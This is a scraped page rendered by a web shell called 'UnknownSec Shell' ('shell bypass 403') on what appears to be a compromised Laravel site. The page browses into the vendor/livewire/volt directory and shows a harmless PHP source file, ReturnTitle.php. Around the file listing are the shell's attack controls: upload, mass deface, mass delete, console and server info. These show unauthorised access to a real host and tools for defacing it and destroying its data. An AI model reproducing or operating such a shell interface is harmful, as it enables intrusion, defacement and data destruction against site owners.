shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
vendor
/
livewire
/
volt
/
src
/
Actions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ReturnTitle.php
<?php namespace Livewire\Volt\Actions; use Closure; use Illuminate\Container\Container; use Livewire\Volt\CompileContext; use Livewire\Volt\Component; use Livewire\Volt\Contracts\Action; class ReturnTitle implements Action { /** * {@inheritDoc} */ public function execute(CompileContext $context, Component $component, array $arguments): ?string { if ($context->title instanceof Closure) { return Container::getInstance()->call( Closure::bind($context->title, $component, $component::class), ); } return $context->title; } }
© 2026 UnknownSec